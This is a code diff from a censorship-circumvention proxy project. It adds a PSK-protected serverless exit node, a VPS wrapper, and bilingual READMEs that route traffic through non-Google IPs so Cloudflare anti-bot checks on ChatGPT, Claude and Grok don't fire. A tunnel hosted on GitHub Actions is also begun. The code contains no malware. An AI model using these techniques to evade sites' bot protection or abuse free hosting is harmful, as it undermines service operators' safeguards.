+  if (!item || typeof item !== "object") {
+    return { e: "bad item" };
+  }
+  if (!item.u || typeof item.u !== "string" || !/^https?:\/\//i.test(item.u)) {
+    return { e: "bad url" };
+  }
+
+  let targetUrl;
+  try {
+    targetUrl = new URL(item.u);
+  } catch (_err) {
+    return { e: "bad url" };
+  }
+  if (targetUrl.hostname === selfHost) {
+    return { e: "self-fetch blocked" };
+  }
+
+  const headers = new Headers();
+  if (item.h && typeof item.h === "object") {
+    for (const [k, v] of Object.entries(item.h)) {
+      if (SKIP_HEADERS.has(k.toLowerCase())) continue;
+      try {
+        headers.set(k, v);
+      } catch (_err) {
+        // Worker rejects some headers (e.g. forbidden ones); skip
+        // rather than fail the whole item.
+      }
+    }
+  }
+  headers.set(RELAY_HOP_HEADER, "1");
+
+  const method = (item.m || "GET").toUpperCase();
+  const fetchOptions = {
+    method,
+    headers,
+    redirect: item.r === false ? "manual" : "follow",
+  };
+
+  // Code.gs/UrlFetchApp tolerates a body on GET/HEAD (browsers don't
+  // do this, but custom clients sometimes do); Workers' native fetch
+  // throws TypeError if you set a body on a body-prohibited method.
+  // To match Code.gs's permissiveness, silently drop the body for
+  // those methods rather than failing the whole item.
+  const bodyAllowed = method !== "GET" && method !== "HEAD";
+  if (item.b && bodyAllowed) {
+    try {
+      const binary = Uint8Array.from(atob(item.b), (c) => c.charCodeAt(0));
+      fetchOptions.body = binary;
+      if (item.ct && !headers.has("content-type")) {
+        headers.set("content-type", item.ct);
+      }
+    } catch (_err) {
+      return { e: "bad body base64" };
+    }
+  }
+
+  let resp;
+  try {
+    resp = await fetch(targetUrl.toString(), fetchOptions);
+  } catch (err) {
+    return { e: "fetch failed: " + String(err) };
+  }
+
+  const buffer = await resp.arrayBuffer();
+  const uint8 = new Uint8Array(buffer);
+
+  // Avoid call-stack overflow from String.fromCharCode.apply on big
+  // bodies — chunk the conversion.
+  let binary = "";
+  const chunkSize = 0x8000;
+  for (let i = 0; i < uint8.length; i += chunkSize) {
+    binary += String.fromCharCode.apply(null, uint8.subarray(i, i + chunkSize));
+  }
+  const base64 = btoa(binary);
+
+  // Note: Headers.forEach delivers keys lowercased per the Fetch
+  // spec, whereas Code.gs's getAllHeaders preserves the origin's
+  // casing. mhrv-rs treats headers case-insensitively, but anything
+  // downstream that does a case-sensitive string compare will see
+  // a backend-dependent difference. There is no Workers API to
+  // recover the origin casing, so we accept the divergence.
+  const responseHeaders = {};
+  resp.headers.forEach((v, k) => {
+    responseHeaders[k] = v;
+  });
+
+  return {
+    s: resp.status,
+    h: responseHeaders,
+    b: base64,
+  };
+}
+
+function json(obj, status = 200) {
+  return new Response(JSON.stringify(obj), {
+    status,
+    headers: { "content-type": "application/json" },
+  });
+}
diff --git a/assets/exit_node/README.fa.md b/assets/exit_node/README.fa.md
new file mode 100644
index 00000000..e497adcd
--- /dev/null
+++ b/assets/exit_node/README.fa.md
@@ -0,0 +1,184 @@
+<div dir="rtl">
+
+# Exit node — دور زدن CF anti-bot برای ChatGPT / Claude / Grok / X
+
+بسیاری از سرویس‌های پشت Cloudflare، traffic از رنج IP datacenter
+گوگل را به‌عنوان bot flag می‌کنن + به‌جای صفحه واقعی یک Turnstile /
+CAPTCHA / 502 challenge می‌فرستن. `UrlFetchApp.fetch()` در Apps
+Script از همان رنج IP datacenter Google خروج می‌کنه، پس برای سایت‌هایی مانند:
+
+- **chatgpt.com / openai.com**
+- **claude.ai**
+- **grok.com / x.com**
+
+…مسیر apps_script-mode عادی mhrv-rs ارورهایی مثل
+`Relay error: json: key must be a string at line 2 column 1` یا
+`502 Relay error` می‌ده چون Code.gs در حال wrap کردن صفحه‌ی HTML
+challenge CF است که کلاینت نمی‌تونه parse کنه.
+
+**Exit node** یک handler کوچک HTTP به زبان TypeScript است که روی یک
+پلتفرم serverless TypeScript که خودت تأییدش می‌کنی deploy می‌شه و بین
+Apps Script و destination قرار می‌گیره. مسیر traffic این می‌شه:
+
+```
+Browser ─┐                                                ┌─→ Destination
+         │                                                │   (chatgpt.com)
+         ▼                                                │
+    mhrv-rs                                               │
+       │                                                  │
+       │  TLS به Google IP، SNI=www.google.com (DPI cover)│
+       ▼                                                  │
+   Apps Script (Google datacenter)                        │
+       │                                                  │
+       │  UrlFetchApp.fetch(EXIT_NODE_URL)                │
+       ▼                                                  │
+    exit node خودت (IP غیر گوگل)                          │
+       │                                                  │
+       │  fetch(real_url)                                 │
+       └──────────────────────────────────────────────────┘
+```
+
+Destination IP خروجی exit node رو می‌بینه، نه IP datacenter گوگل.
+Heuristic anti-bot CF نمی‌سوزه + صفحه واقعی برمی‌گرده.
+
+**نکته مهم:** leg user-side (Iran ISP → Apps Script) **بدون تغییر**
+است. ISP فقط TLS به Google IP می‌بینه — second hop کاملاً درون
+outbound Apps Script اجرا می‌شه، invisible از شبکه‌ی کاربر. پس DPI
+evasion property که mhrv-rs براش ساخته شده، دست نمی‌خوره.
+
+## راه‌اندازی
+
+handler در [`exit_node.ts`](exit_node.ts) plain TypeScript است که از
+APIهای web-standard (`Request`، `Response`، `fetch`) استفاده می‌کنه و
+روی هر پلتفرمی که serverless-fetch runtime داره اجرا می‌شه.
+
+### مراحل عمومی (روی هر host)
+
+۱. فایل [`exit_node.ts`](exit_node.ts) رو باز کنید و PSK پیش‌فرض رو در
+ابتدا عوض کنید:
+   ```ts
+   const PSK = "<your-strong-secret>";
+   ```
+   Strong secret تولید کنید با `openssl rand -hex 32` از terminal.
+   **placeholder رو در production نگذارید** — کد عمداً fail-closed است
+   (در هر request 503 برمی‌گردونه) تا placeholder replace نشده، تا
+   جلوی serve شدن به‌عنوان open relay accidentally گرفته بشه.
+۲. فایل رو روی host انتخابی **deploy** کنید (گزینه‌ها در ادامه).
+۳. URL public deployment رو **copy** کنید.
+۴. در `config.json` mhrv-rs، block `exit_node` اضافه کنید:
+   ```json
+   "exit_node": {
+     "enabled": true,
+     "relay_url": "https://your-deployed-exit-node.example.com",
+     "psk": "<همان PSK که در گام ۱ گذاشتید>",
+     "mode": "selective",
+     "hosts": ["chatgpt.com", "claude.ai", "x.com", "grok.com", "openai.com"]
+   }
+   ```
+۵. mhrv-rs رو **restart** کنید (Disconnect + Connect، یا `kill` +
+   restart binary).
+۶. **تست** کنید — `chatgpt.com` یا `grok.com` رو از browser pointed به
+   mhrv-rs proxy باز کنید. صفحه login واقعی رو می‌بینید، نه CF
+   challenge.
+
+config مثال کامل در
+[`config.exit-node.example.json`](../../config.exit-node.example.json)
+در root repo.
+
+### گزینه‌های hosting
+
+اسکریپت یک فایل self-contained است. هر host که می‌توانید signup کنید +
+به‌اش اعتماد دارید رو انتخاب کنید:
+
+| Host | توضیحات |
+|---|---|
+| **Deno Deploy** ([deno.com/deploy](https://deno.com/deploy)) | free tier برای personal use کافی است. با `deployctl deploy --prod exit_node.ts` یا GitHub Actions deploy کنید. همان web-standard API. |
+| **fly.io** | free tier با محدودیت. handler رو در یک server thin بسته‌بندی کنید (`Deno.serve(handler)` برای Deno یا یک Express wrapper برای Node) + Dockerfile اضافه کنید. IP دائم، region جغرافیایی قابل انتخاب. |
+| **VPS شخصی خودت** | از فایل آماده [`wrapper.ts`](wrapper.ts) استفاده کن: `deno run --allow-net --allow-env --allow-read wrapper.ts`. خودکار Deno / Bun / Node 22+ تشخیص می‌ده. حداکثر کنترل، ~۳-۵ دلار در ماه. |
+| **Cloudflare Workers** | **کمک نمی‌کنه.** CF Workers از IP space خود CF خروج می‌کنن، که CF anti-bot هنوز به‌عنوان worker-internal flag می‌کنه. |
+
+برای اکثر کاربرانی که مسیر local رو اجرا می‌کنن، Deno Deploy
+سریع‌ترین setup است. برای deployment طولانی‌مدت تحت کنترل کامل
+خودت، VPS کوچک شخصی ایده‌آل است.
+
+## انتخاب `selective` vs `full`
+
+| Mode | چی می‌کنه | کی استفاده کنید |
+|---|---|---|
+| `selective` (default) | فقط hosts در `hosts` از طریق exit node می‌رن؛ بقیه از مسیر Apps Script عادی | توصیه می‌شه. exit-node hop ~۲۰۰-۵۰۰ms به هر request اضافه می‌کنه — برای سایت‌هایی reserve کنید که نیاز به non-Google IP دارن. |
+| `full` | همه‌ی request‌ها از طریق exit node می‌رن | فقط زمانی که کل workload شما CF-anti-bot affected است، یا exit node خود سریع‌تر روی مسیر شبکه شما (rare). budget runtime host رو برای سایت‌هایی که نیاز ندارن می‌سوزونه. |
+
+## رفتار در صورت failure
+
+اگر exit node در دسترس نباشه، 5xx برمی‌گردونه، یا response malformed
+بفرسته، mhrv-rs **به‌طور خودکار به Apps Script relay عادی fallback
+می‌کنه**. در log یک خط `warn: exit node failed for ... — falling back
+to direct Apps Script` می‌بینید. سایت‌هایی که نیاز به exit node دارن در آن
+case fail می‌گیرن (CF challenge)، ولی سایر سایت‌ها کار می‌کنن — یک
+exit node down شما رو fully offline نمی‌کنه.
+
+## Security model
+
+PSK تنها چیز است که مانع می‌شه endpoint deployed یک public open proxy
+بشه. مثل password برخورد کنید:
+
+- **commit نکنید** PSK رو به source control. اکثر hostها به‌طور default
+  کد deployed رو private نگه می‌دارن؛ همان‌طور نگه دارید.
+- **publicly share نکنید** PSK رو. هر کسی که هم URL هم PSK رو داره
+  می‌تونه quota host شما رو به‌عنوان proxy خود استفاده کنه.
+- **rotate** اگر leak مشکوک هست. PSK رو در source deployed تغییر بدید،
+  redeploy کنید، سپس `psk` در `config.json` mhrv-rs رو update + restart.
+
+اسکریپت همچنین شامل **loop guard** هست (refuse می‌کنه fetch host خود)
++ **placeholder check** (در صورت `PSK === "CHANGE_ME_TO_A_STRONG_SECRET"`
+return 503 می‌کنه) تا یک fresh deploy بدون setup نتونه به‌طور
+accidentally به‌عنوان open relay سرو بشه.
+
+## چرا default-on نیست
+
+- ۲۰۰-۵۰۰ms به هر request اضافه می‌کنه (hop اضافی)
+- budget bandwidth free-tier host رو می‌سوزونه
+- برای سایت‌هایی که CF anti-bot ندارن benefit نداره
+- Setup یک account جداگانه روی پلتفرم third-party می‌خواد
+
+پس `enabled: false` default است. کاربرانی که خصوصاً به ChatGPT / Claude /
+Grok اهمیت می‌دن opt in؛ همه‌ی دیگران lighter اجرا می‌کنن.
+
+## Troubleshooting
+
+**`exit node refused or errored: unauthorized`** — PSK mismatch.
+بررسی کنید `psk` در `config.json` دقیقاً با `PSK` constant در source
+deployed match هست. whitespace + quoting مهم است.
+
+**`exit node refused or errored: exit_node misconfigured: PSK is still
+the placeholder`** — فراموش کردید `CHANGE_ME_TO_A_STRONG_SECRET` رو
+در source جایگزین کنید. فایل deployed رو edit + save + redeploy کنید.
+
+**`exit node failed for ...: connection refused`** — URL اشتباه است
+یا deployment live نیست. با hit کردن URL مستقیم از browser verify
+کنید — باید `{"e":"method_not_allowed"}` برگردونه (handler expects
+POST).
+
+**`exit node failed for ...: timeout`** — outbound host slow است
+یا destination slow. region متفاوت رو امتحان کنید، یا latency
+trade-off رو accept کنید.
+
+**سایت همچنان CF challenge نشون می‌ده بعد از enable exit node** — CF
+IP host شما رو هم flag کرده. بعضی hosting provider‌ها outbound IP
+space‌شون روی CF bot blocklist است. workarounds: host دیگه امتحان
+کنید (VPS شخصی شما clean IP می‌ده)، یا سایت رو به `passthrough_hosts`
+اضافه کنید (MITM رو bypass می‌کنه؛ از real IP ISP شما استفاده
+می‌کنه).
+
+## همچنین ببینید
+
+- [English version](README.md) of this doc
+- [`exit_node.ts`](exit_node.ts) — منبع handler (با hardening)
+- [`config.exit-node.example.json`](../../config.exit-node.example.json)
+  — config مثال کامل
+- Issue [#382](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/382)
+  — thread tracking canonical Cloudflare anti-bot
+- Issue [#309](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/309)
+  — roadmap CF WARP integration (approach جایگزین، longer-horizon)
+
+</div>
diff --git a/assets/exit_node/README.md b/assets/exit_node/README.md
new file mode 100644
index 00000000..be84bcda
--- /dev/null
+++ b/assets/exit_node/README.md
@@ -0,0 +1,183 @@
+# Exit node — bypassing CF anti-bot for ChatGPT / Claude / Grok / X
+
+Many Cloudflare-fronted services flag traffic from Google datacenter
+IPs as bots and serve a Turnstile / CAPTCHA / 502 challenge instead of
+the real page. `UrlFetchApp.fetch()` in Apps Script always exits from
+Google's datacenter IP space, so for sites like:
+
+- **chatgpt.com / openai.com**
+- **claude.ai**
+- **grok.com / x.com**
+
+…mhrv-rs's normal apps_script-mode path returns errors like `Relay
+error: json: key must be a string at line 2 column 1` or `502 Relay
+error` because Code.gs is wrapping a CF challenge HTML page that the
+client can't parse as relay JSON.
+
+The **exit node** is a small TypeScript HTTP handler you deploy on a
+serverless TypeScript host you control. It sits between Apps Script
+and the destination, so the request chain becomes:
+
+```
+Browser ─┐                                                ┌─→ Destination
+         │                                                │   (chatgpt.com)
+         ▼                                                │
+    mhrv-rs                                               │
+       │                                                  │
+       │  TLS to Google IP, SNI=www.google.com (DPI cover)│
+       ▼                                                  │
+   Apps Script (Google datacenter)                        │
+       │                                                  │
+       │  UrlFetchApp.fetch(EXIT_NODE_URL)                │
+       ▼                                                  │
+    your exit node (non-Google IP)                        │
+       │                                                  │
+       │  fetch(real_url)                                 │
+       └──────────────────────────────────────────────────┘
+```
+
+The destination sees the exit node's outbound IP, not a Google
+datacenter IP. CF's anti-bot heuristic doesn't fire and the real page
+comes back.
+
+**Important property preserved:** the user-side leg (Iran ISP →
+Apps Script) is unchanged. The ISP only sees TLS to a Google IP — the
+second hop happens entirely inside Apps Script's outbound, invisible
+from the user's network. The DPI evasion property mhrv-rs is built
+around stays intact.
+
+## Setup
+
+The handler in [`exit_node.ts`](exit_node.ts) is plain TypeScript that
+uses only web-standard APIs (`Request`, `Response`, `fetch`). It runs
+on any platform with a serverless-fetch runtime.
+
+### Generic steps (apply to every host)
+
+1. **Open `exit_node.ts`** and replace the placeholder PSK at the top:
+   ```ts
+   const PSK = "<your-strong-secret>";
+   ```
+   Generate a strong secret with `openssl rand -hex 32`. **Do not leave
+   the placeholder** — the script is deliberately fail-closed (returns
+   503 on every request until the placeholder is replaced) so a fresh
+   deploy without configuration can't accidentally serve as an open
+   relay.
+2. **Deploy** to your chosen host (see options below).
+3. **Copy the public URL** of the deployed handler.
+4. **In `mhrv-rs` config.json**, add an `exit_node` block:
+   ```json
+   "exit_node": {
+     "enabled": true,
+     "relay_url": "https://your-deployed-exit-node.example.com",
+     "psk": "<the same PSK you set in step 1>",
+     "mode": "selective",
+     "hosts": ["chatgpt.com", "claude.ai", "x.com", "grok.com", "openai.com"]
+   }
+   ```
+5. **Restart mhrv-rs** (Disconnect + Connect, or kill + restart the
+   binary).
+6. **Test** — open `chatgpt.com` or `grok.com` from a browser pointed
+   at mhrv-rs's proxy. You should see the real login page, not a CF
+   challenge.
+
+A complete example config is at
+[`config.exit-node.example.json`](../../config.exit-node.example.json)
+in the repo root.
+
+### Hosting options
+
+The script is one self-contained file. Pick whichever host you can
+sign up for and trust:
+
+| Host | Notes |
+|---|---|
+| **Deno Deploy** ([deno.com/deploy](https://deno.com/deploy)) | Free tier covers personal use. Deploy via `deployctl deploy --prod exit_node.ts` or via GitHub Actions. Same web-standard API as the script expects. |
+| **fly.io** | Free tier with limits. Wrap the handler in a thin server (`Deno.serve(handler)` for Deno or an Express wrapper for Node) + add a Dockerfile. Persistent IPs, picks geographic region. |
+| **Your own VPS** | Use the included [`wrapper.ts`](wrapper.ts): `deno run --allow-net --allow-env --allow-read wrapper.ts`. Auto-detects Deno / Bun / Node 22+. Most control, ~$3-5/mo. |
+| **Cloudflare Workers** | **Doesn't help.** CF Workers exit through CF's own IP space, which CF anti-bot still flags as worker-internal traffic. |
+
+For most users running locally, Deno Deploy is the fastest setup. For
+a long-term deployment you control end-to-end, your own small VPS is
+ideal.
+
+## `selective` vs `full`
+
+| Mode | What it does | When to use |
+|---|---|---|
+| `selective` (default) | Only hosts in `hosts` route via the exit node; everything else takes the normal Apps Script path | Recommended. The exit-node hop adds ~200-500ms per request, so reserve it for sites that actually need a non-Google IP. |
+| `full` | Every request routes via the exit node | Only when your entire workload is CF-anti-bot affected, or when your exit node is faster than Apps Script on your network path (rare). Burns the exit node's runtime budget on sites that don't need it. |
+
+## Behaviour on failure
+
+If the exit node is unreachable, returns 5xx, or returns a malformed
+response, mhrv-rs **automatically falls back to the regular Apps
+Script relay**. The log shows a `warn: exit node failed for ... —
+falling back to direct Apps Script` line. The CF-affected sites then
+fail (CF challenge), but every other site keeps working — a downed
+exit node doesn't take you fully offline.
+
+## Security model
+
+The PSK is the only thing keeping the deployed endpoint from being a
+public open proxy. Treat it like a password:
+
+- **Don't commit** the PSK to source control. Most TypeScript hosts
+  default deployed code to private; keep it that way.
+- **Don't share publicly.** Anyone with both the URL and the PSK can
+  use the deployment as their own proxy and burn your runtime quota.
+- **Rotate** if you suspect a leak. Change the PSK in the deployed
+  source, redeploy, then update `psk` in `mhrv-rs` config.json and
+  restart.
+
+The script also includes a **loop guard** (refuses to fetch its own
+host) and a **placeholder check** (returns 503 if `PSK ===
+"CHANGE_ME_TO_A_STRONG_SECRET"`) so a fresh deploy without
+configuration can't be accidentally served as an open relay.
+
+## Why isn't this on by default?
+
+- Adds ~200-500ms per request through the exit-node hop
+- Burns the host's free-tier runtime quota
+- No benefit for sites that don't have CF anti-bot
+- Requires signing up for a separate third-party platform
+
+So `enabled: false` is the default. Users who specifically need
+ChatGPT / Claude / Grok opt in; everyone else runs lighter.
+
+## Troubleshooting
+
+**`exit node refused or errored: unauthorized`** — PSK mismatch.
+Double-check `psk` in `config.json` matches the `PSK` constant in your
+deployed source character-for-character. Whitespace and quoting
+matter.
+
+**`exit_node misconfigured: PSK is still the placeholder`** — you
+forgot to replace `CHANGE_ME_TO_A_STRONG_SECRET` in the source. Edit
+the deployed file, save, redeploy.
+
+**`exit node failed for ...: connection refused`** — the URL is wrong
+or the deployment isn't live. Verify by hitting the URL in a browser
+— it should respond with `{"e":"method_not_allowed"}` (the script
+expects POST).
+
+**`exit node failed for ...: timeout`** — the host's outbound or the
+destination is slow. Try a different region, or accept the latency
+trade-off.
+
+**Site still shows a CF challenge after enabling the exit node** —
+CF has flagged your host's IP too. Some hosting providers' outbound
+IP space is on CF's bot blocklist. Workarounds: try a different host
+(your own VPS gives you a clean IP), or add the affected site to
+`passthrough_hosts` to bypass the MITM and use your real ISP IP.
+
+## See also
+
+- [Persian (راهنمای فارسی)](README.fa.md) version of this doc
+- [`exit_node.ts`](exit_node.ts) — the handler source (with hardening)
+- [`config.exit-node.example.json`](../../config.exit-node.example.json)
+  — complete example mhrv-rs config
+- Issue [#382](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/382)
+  — canonical thread tracking Cloudflare anti-bot
+- Issue [#309](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/309)
+  — roadmap for CF WARP integration (alternative approach, longer-horizon)
diff --git a/assets/exit_node/exit_node.ts b/assets/exit_node/exit_node.ts
new file mode 100644
index 00000000..0d55045e
--- /dev/null
+++ b/assets/exit_node/exit_node.ts
@@ -0,0 +1,175 @@
+// mhrv-rs exit node — deploy as an HTTP endpoint on any serverless
+// TypeScript host with a public IP that isn't a Google datacenter
+// (Deno Deploy, fly.io, your own VPS, etc.). Uses only web-standard
+// `Request` / `Response` / `fetch` so it's portable across runtimes.
+//
+// Purpose: chain client → Apps Script → this exit node → destination.
+// Apps Script's UrlFetchApp can't reach Cloudflare-protected sites that
+// flag Google datacenter IPs as bots (chatgpt.com, claude.ai, grok.com,
+// many other CF-fronted SaaS). This exit node sits between Apps Script
+// and the destination; the destination sees the exit node's outbound IP
+// (generally not flagged as Google datacenter) and accepts the request.
+//
+// Setup:
+//   1. Pick a host that runs web-standard fetch handlers (e.g. Deno
+//      Deploy, fly.io with a thin server wrapper, or any cheap VPS
+//      running Deno / Node + this script as a handler).
+//   2. Paste the contents of this file as the request handler.
+//   3. Set PSK below to a strong secret (`openssl rand -hex 32` from
+//      a terminal — DO NOT leave the placeholder in production).
+//   4. Deploy and copy the public URL of the deployed handler.
+//   5. In mhrv-rs config.json, add:
+//        "exit_node": {
+//          "enabled": true,
+//          "relay_url": "https://your-deployed-exit-node.example.com",
+//          "psk": "<the same PSK you set above>",
+//          "mode": "selective",
+//          "hosts": ["chatgpt.com", "claude.ai", "x.com", "grok.com"]
+//        }
+//
+// Threat model: PSK is the only thing keeping this from being an open
+// proxy on the public internet. Treat it like a password: do not commit
+// to source control, do not share publicly, rotate if leaked. The exit
+// node refuses all requests that don't carry the matching PSK.
+//
+// Failure mode: if the exit node is unreachable, mhrv-rs falls back to
+// the regular Apps Script relay automatically — the only consequence
+// of an offline exit node is that ChatGPT/Claude/Grok stop working;
+// other sites are unaffected.
+
+const PSK = "CHANGE_ME_TO_A_STRONG_SECRET";
+
+// Headers the client may send that must NOT be forwarded to the
+// destination — they're hop-by-hop or would break re-encoding.
+const STRIP_HEADERS = new Set([
+  "host",
+  "connection",
+  "content-length",
+  "transfer-encoding",
+  "proxy-connection",
+  "proxy-authorization",
+  "x-forwarded-for",
+  "x-forwarded-host",
+  "x-forwarded-proto",
+  "x-forwarded-port",
+  "x-real-ip",
+  "forwarded",
+  "via",
+]);
+
+function decodeBase64ToBytes(input: string): Uint8Array {
+  const bin = atob(input);
+  const out = new Uint8Array(bin.length);
+  for (let i = 0; i < bin.length; i++) out[i] = bin.charCodeAt(i);
+  return out;
+}
+
+function encodeBytesToBase64(bytes: Uint8Array): string {
+  let bin = "";
+  for (let i = 0; i < bytes.length; i++) bin += String.fromCharCode(bytes[i]);
+  return btoa(bin);
+}
+
+function sanitizeHeaders(h: unknown): Record<string, string> {
+  const out: Record<string, string> = {};
+  if (!h || typeof h !== "object") return out;
+  for (const [k, v] of Object.entries(h as Record<string, unknown>)) {
+    if (!k) continue;
+    if (STRIP_HEADERS.has(k.toLowerCase())) continue;
+    out[k] = String(v ?? "");
+  }
+  return out;
+}
+
+export default async function (req: Request): Promise<Response> {
+  // Fail closed on the placeholder PSK so a fresh deploy without setup
+  // can't accidentally serve as an open relay.
+  if (PSK === "CHANGE_ME_TO_A_STRONG_SECRET") {
+    return Response.json(
+      {
+        e:
+          "exit_node misconfigured: PSK is still the placeholder. Set " +
+          "a strong secret in the source before deploying.",
+      },
+      { status: 503 },
+    );
+  }
+
+  try {
+    if (req.method !== "POST") {
+      return Response.json({ e: "method_not_allowed" }, { status: 405 });
+    }
+
+    const body = await req.json();
+    if (!body || typeof body !== "object") {
+      return Response.json({ e: "bad_json" }, { status: 400 });
+    }
+
+    const k = String((body as any).k ?? "");
+    const u = String((body as any).u ?? "");
+    const m = String((body as any).m ?? "GET").toUpperCase();
+    const h = sanitizeHeaders((body as any).h);
+    const b64 = (body as any).b;
+
+    if (k !== PSK) {
+      return Response.json({ e: "unauthorized" }, { status: 401 });
+    }
+    if (!/^https?:\/\//i.test(u)) {
+      return Response.json({ e: "bad url" }, { status: 400 });
+    }
+
+    // Loop guard: if u points at this exit node's own host, refuse.
+    // Without this, a misconfigured client could chain exit-node →
+    // exit-node → exit-node → ... and burn the host's runtime budget.
+    try {
+      const reqUrl = new URL(req.url);
+      const dstUrl = new URL(u);
+      if (
+        reqUrl.host === dstUrl.host &&
+        reqUrl.protocol === dstUrl.protocol
+      ) {
+        return Response.json({ e: "exit-node loop refused" }, { status: 400 });
+      }
+    } catch {
+      // Malformed URL — let the fetch below 400.
+    }
+
+    let payload: Uint8Array | undefined;
+    if (typeof b64 === "string" && b64.length > 0) {
+      payload = decodeBase64ToBytes(b64);
+    }
+
+    const resp = await fetch(u, {
+      method: m,
+      headers: h,
+      body: payload,
+      redirect: "manual",
+    });
+
+    // `fetch()` (Deno / Bun / Node) auto-decompresses gzip / br / deflate
+    // responses, so `resp.arrayBuffer()` returns plain bytes — but the
+    // destination's `Content-Encoding` header is still on `resp.headers`.
+    // Forwarding it would tell the client browser "this body is gzipped"
+    // when it isn't, producing `Content Encoding Error` (#964). Same goes
+    // for `Content-Length` — the post-decompression byte count is
+    // different from what the destination announced. Strip both. The
+    // Apps Script + Rust transport layer below us re-frames the wire body
+    // anyway, so neither header is meaningful to forward.
+    const data = new Uint8Array(await resp.arrayBuffer());
+    const respHeaders: Record<string, string> = {};
+    resp.headers.forEach((value, key) => {
+      const lower = key.toLowerCase();
+      if (lower === "content-encoding" || lower === "content-length") return;
+      respHeaders[key] = value;
+    });
+
+    return Response.json({
+      s: resp.status,
+      h: respHeaders,
+      b: encodeBytesToBase64(data),
+    });
+  } catch (err) {
+    const message = err instanceof Error ? err.message : String(err);
+    return Response.json({ e: message }, { status: 500 });
+  }
+}
diff --git a/assets/exit_node/wrapper.ts b/assets/exit_node/wrapper.ts
new file mode 100644
index 00000000..4c30eb3f
--- /dev/null
+++ b/assets/exit_node/wrapper.ts
@@ -0,0 +1,119 @@
+// VPS wrapper for exit_node.ts — used when you run the exit node on your
+// own server (any platform that can run Deno or Bun) instead of on a
+// platform that auto-invokes the default export (Deno Deploy, Val.town,
+// Cloudflare Workers, etc.).
+//
+// Pick ONE runtime + matching command:
+//
+//   Deno (recommended, comes with HTTPS support out of the box):
+//     deno run --allow-net --allow-env wrapper.ts
+//
+//   Bun (also works, slightly faster cold start):
+//     bun run wrapper.ts
+//
+//   Node 22+ (no extra runtime; needs `--experimental-fetch` only on <22):
+//     node wrapper.ts                # if your Node has fetch + Bun's
+//                                    # global Request/Response (22+)
+//
+// ENV VARS (all optional):
+//   PORT       — TCP port to bind. Default 8443.
+//   HOST       — bind address. Default 0.0.0.0 (all interfaces).
+//   CERT_FILE  — path to TLS cert PEM. Omit for plain HTTP (use a reverse
+//                proxy like Caddy / nginx / Cloudflare Tunnel for TLS).
+//   KEY_FILE   — path to TLS key PEM (must be set together with CERT_FILE).
+//
+// Behind a reverse proxy (Caddy, nginx, Cloudflare Tunnel) you typically
+// run this on plain HTTP and let the proxy terminate TLS — that's the
+// simpler setup if you already have a domain. Set PORT=8443 and point
+// your reverse proxy at http://localhost:8443.
+//
+// Standalone TLS (rare but supported): set CERT_FILE + KEY_FILE to
+// matching PEM-encoded files and Deno will terminate TLS itself. Use
+// Let's Encrypt's certbot / acme.sh to fetch a real cert; self-signed
+// will not work (Apps Script's UrlFetchApp validates the chain).
+//
+// EDIT exit_node.ts FIRST: replace the placeholder PSK with a strong
+// secret. The wrapper imports the handler from exit_node.ts directly,
+// so changing the constant in exit_node.ts is all you need.
+
+import handler from "./exit_node.ts";
+
+// Deno (preferred)
+if (typeof (globalThis as any).Deno !== "undefined") {
+  const Deno = (globalThis as any).Deno;
+  const port = Number(Deno.env.get("PORT") ?? 8443);
+  const hostname = Deno.env.get("HOST") ?? "0.0.0.0";
+  const certFile = Deno.env.get("CERT_FILE");
+  const keyFile = Deno.env.get("KEY_FILE");
+
+  if (certFile && keyFile) {
+    Deno.serve(
+      {
+        port,
+        hostname,
+        cert: Deno.readTextFileSync(certFile),
+        key: Deno.readTextFileSync(keyFile),
+      },
+      handler,
+    );
+    console.log(`exit_node listening on https://${hostname}:${port}`);
+  } else {
+    Deno.serve({ port, hostname }, handler);
+    console.log(
+      `exit_node listening on http://${hostname}:${port} ` +
+        `(no TLS — terminate it with a reverse proxy like Caddy/nginx)`,
+    );
+  }
+}
+// Bun
+else if (typeof (globalThis as any).Bun !== "undefined") {
+  const Bun = (globalThis as any).Bun;
+  const port = Number(process.env.PORT ?? 8443);
+  const hostname = process.env.HOST ?? "0.0.0.0";
+
+  Bun.serve({
+    port,
+    hostname,
+    fetch: handler,
+    tls: process.env.CERT_FILE && process.env.KEY_FILE
+      ? {
+          cert: Bun.file(process.env.CERT_FILE),
+          key: Bun.file(process.env.KEY_FILE),
+        }
+      : undefined,
+  });
+  console.log(`exit_node listening on ${hostname}:${port}`);
+}
+// Node 22+ — uses the built-in `node:http` module + globalThis.Request/Response
+else if (typeof (globalThis as any).process !== "undefined") {
+  const { createServer } = await import("node:http");
+  const port = Number(process.env.PORT ?? 8443);
+  const hostname = process.env.HOST ?? "0.0.0.0";
+
+  createServer(async (req, res) => {
+    // Build a web-standard Request from Node's IncomingMessage.
+    const chunks: Uint8Array[] = [];
+    for await (const c of req) chunks.push(c as Uint8Array);
+    const body = chunks.length ? Buffer.concat(chunks) : undefined;
+
+    const url = `http://${req.headers.host ?? hostname}${req.url ?? "/"}`;
+    const webReq = new Request(url, {
+      method: req.method,
+      headers: req.headers as Record<string, string>,
+      body,
+    });
+
+    const webRes = await handler(webReq);
+
+    res.statusCode = webRes.status;
+    webRes.headers.forEach((v: string, k: string) => res.setHeader(k, v));
+    const buf = new Uint8Array(await webRes.arrayBuffer());
+    res.end(buf);
+  }).listen(port, hostname, () => {
+    console.log(`exit_node listening on http://${hostname}:${port}`);
+  });
+} else {
+  throw new Error(
+    "No supported runtime detected. Run this file with Deno, Bun, or Node 22+.",
+  );
+}
diff --git a/assets/github-actions-tunnel/README.md b/assets/github-actions-tunnel/README.md
new file mode 100644
index 00000000..8bb92900
--- /dev/null
+++ b/assets/github-actions-tunnel/README.md
@@ -0,0 +1,129 @@
+# GitHub Actions Full Tunnel
+
+A temporary, repeatable Full tunnel mode for users who cannot or prefer not to
+purchase a VPS. Uses GitHub Actions free hosted runners to run the official
+`mhrv-tunnel-node` container for 6-hour sessions at no cost.
+
+## Who This Is For
+
+- Users who cannot access international payment methods to purchase a VPS
+- Users who need Full tunnel mode occasionally — CAPTCHA-protected sites,
+  streaming, or services that require a real browser
+- Users who want to test Full tunnel mode before committing to a permanent VPS
+- Users in networks where the standard `apps_script` mode is sufficient for
+  daily browsing, but Full mode is needed for specific use cases
+
+## How It Works
+
+1. A GitHub Actions workflow starts the official `mhrv-tunnel-node` Docker
+   container on a free hosted runner
